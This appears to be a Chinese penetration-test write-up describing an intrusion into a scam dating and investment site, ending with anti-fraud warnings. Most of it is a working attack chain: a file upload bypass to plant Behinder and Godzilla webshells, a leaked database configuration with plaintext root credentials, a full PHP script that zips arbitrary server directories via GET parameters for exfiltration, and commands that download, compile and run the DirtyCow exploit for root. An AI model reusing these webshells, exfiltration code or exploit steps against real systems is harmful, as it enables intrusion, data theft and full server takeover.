0x02 上传上线

发现在发布动态处存在文件上传

使用 Burp Suite 截取数据包，测试后发现目标站点只返回0或1

上传后在朋友圈界面发现该功能正常，那么对应的图片路径在哪呢？

通过抓包发现该图片的具体地址

修改数据包将其文件名后缀修改为php时则无法上传，可能存在防护机制

文件上传漏洞获取webshell

幸运的是目标直接返回了木马地址，使用冰蝎连接目标

至此 webshell 成功上线，但可惜的是这是 docker 环境。同时为了维持对目标站点的控制，继续上传了一个哥斯拉马

0x03 信息搜集

return [    // 数据库类型    'type'            => Env::get('database.type', 'mysql'),    // 服务器地址    'hostname'        => Env::get('database.hostname', '192.168.0.59'),    // 数据库名    'database'        => Env::get('database.database', 'netchat'),    // 用户名    'username'        => Env::get('database.username', 'root'),    // 密码    'password'        => Env::get('database.password', 'MysqlNetchatPWD#'),    // 端口    'hostport'        => Env::get('database.hostport', '3305'),];

https://xx.xx.xx.xx/adim888/index/login

<?php error_reporting(0); class PHPZip{    var $dirInfo = array("0","0");    var $datasec = array();    var $ctrl_dir = array();    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";    var $old_offset   = 0;     function createZip($dir, $zipfilename){        if (@function_exists('gzcompress')){            @set_time_limit("0");            if (is_array($dir)){                $fd = fopen ($dir, "r");                $fileValue = fread ($fd, filesize ($filename));                fclose ($fd);                if (is_array($dir)) $filename = basename($dir);                $this -> addFile($fileValue, "$filename");            }else{                $this->dirTree($dir,$dir);            }             $out = $this -> filezip();            $fp = fopen($zipfilename, "w");            fwrite($fp, $out, strlen($out));            fclose($fp);            $filesize = filesize($zipfilename);             if ($filesize < 104857600) {                echo "create zip success!";            } else {                echo "create zip error!";            }        }     }     //get dir tree..    function dirTree($directory,$rootDir){        $fileDir = $rootDir;        $myDir = dir($directory);        while($file=$myDir->read()){            if(is_dir("$directory/$file") and $file!="." and $file!=".."){                $this->dirInfo[0]++;                $rootDir ="$fileDir$file/";                $this -> addFile('', "$rootDir");                 //go on n's folders                $this->dirTree("$directory/$file",$rootDir);            }else{                if($file!="." and $file!=".."){                    $this->dirInfo[1]++;                    $fileValue = file_get_contents("$directory/$file");                    $this -> addFile($fileValue, "$fileDir$file");                }            }        }        $myDir->close();    }     function unix2DosTime($unixtime = 0) {        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);         if ($timearray['year'] < 1980) {             $timearray['year'] = 1980;             $timearray['mon'] = 1;             $timearray['mday'] = 1;             $timearray['hours'] = 0;             $timearray['minutes'] = 0;             $timearray['seconds'] = 0;        } // end if         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);    }     function addFile($data, $name, $time = 0){        $name = str_replace('\\', '/', $name);         $dtime = dechex($this->unix2DosTime($time));        $hexdtime = '\x' . $dtime[6] . $dtime[7]                  . '\x' . $dtime[4] . $dtime[5]                  . '\x' . $dtime[2] . $dtime[3]                  . '\x' . $dtime[0] . $dtime[1];        eval('$hexdtime = "' . $hexdtime . '";');         $fr = "\x50\x4b\x03\x04";        $fr .= "\x14\x00";            // ver needed to extract        $fr .= "\x00\x00";            // gen purpose bit flag        $fr .= "\x08\x00";            // compression method        $fr .= $hexdtime;             // last mod time and date         // "local file header" segment        $unc_len = strlen($data);        $crc = crc32($data);        $zdata = gzcompress($data);        $c_len = strlen($zdata);        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug        $fr .= pack('V', $crc);             // crc32        $fr .= pack('V', $c_len);           // compressed filesize        $fr .= pack('V', $unc_len);         // uncompressed filesize        $fr .= pack('v', strlen($name));    // length of filename        $fr .= pack('v', 0);                // extra field length        $fr .= $name;         // "file data" segment        $fr .= $zdata;         // "data descriptor" segment (optional but necessary if archive is not        // served as file)        $fr .= pack('V', $crc);                 // crc32        $fr .= pack('V', $c_len);               // compressed filesize        $fr .= pack('V', $unc_len);             // uncompressed filesize         // add this entry to array        $this -> datasec[] = $fr;        $new_offset        = strlen(implode('', $this->datasec));         // now add to central directory record        $cdrec = "\x50\x4b\x01\x02";        $cdrec .= "\x00\x00";                // version made by        $cdrec .= "\x14\x00";                // version needed to extract        $cdrec .= "\x00\x00";                // gen purpose bit flag        $cdrec .= "\x08\x00";                // compression method        $cdrec .= $hexdtime;                 // last mod time & date        $cdrec .= pack('V', $crc);           // crc32        $cdrec .= pack('V', $c_len);         // compressed filesize        $cdrec .= pack('V', $unc_len);       // uncompressed filesize        $cdrec .= pack('v', strlen($name) ); // length of filename        $cdrec .= pack('v', 0 );             // extra field length        $cdrec .= pack('v', 0 );             // file comment length        $cdrec .= pack('v', 0 );             // disk number start        $cdrec .= pack('v', 0 );             // internal file attributes        $cdrec .= pack('V', 32 );            // external file attributes - 'archive' bit set         $cdrec .= pack('V', $this -> old_offset ); // relative offset of local header        $this -> old_offset = $new_offset;         $cdrec .= $name;         // optional extra field, file comment goes here        // save to central directory        $this -> ctrl_dir[] = $cdrec;    }     function filezip(){        $data = implode('', $this -> datasec);        $ctrldir = implode('', $this -> ctrl_dir);         return            $data .            $ctrldir .            $this -> eof_ctrl_dir .            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries "on this disk"            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries overall            pack('V', strlen($ctrldir)) .           // size of central dir            pack('V', strlen($data)) .              // offset to start of central dir            "\x00\x00";                             // .zip file comment length    }} $zip = new PHPZip(); $path = $_GET['path'];$filename = $_GET['filename'];if (isset($path)&&isset($filename)) {    $zip -> createZip($path, $filename);} else {    echo "please input correct path and filename, like <a href=#>http://example.com?path=/home&filename=home.zip</a>";} ?>

select distinct ip from yl_admin_log limit 50

0x04 权限提升

uname -acat /etc/issue

chmod 777 linuxenum.shchmod 777 linux-exploit-suggestor.sh

wget https://www.exploit-db.com/download/40616 ##这里我直接上传了mv 40616 cowroot.c## 正式从这开始gcc cowroot.c -o cowroot -pthreadchmod +x cowroot./cowroot

0x05 受骗分析及警示

招揽有“交友”目的的年轻人通过客服为其提供“服务”安排”漂亮姐姐“骗取年轻人投资年轻人欲望上头开始投资最终被骗人财两空

警惕在私聊中呈现的完美对象，完美人设往往就是诱饵切勿和陌生人谈钱、一起投资，记住，网上“对象”也是陌生人切勿下载安装网上各类投资菠菜APP链接，不要在未验证网站投资不向未验证的陌生账户转账汇款不要参与网上菠菜，涉嫌违法。不要被欲望冲昏了头

关 注 有 礼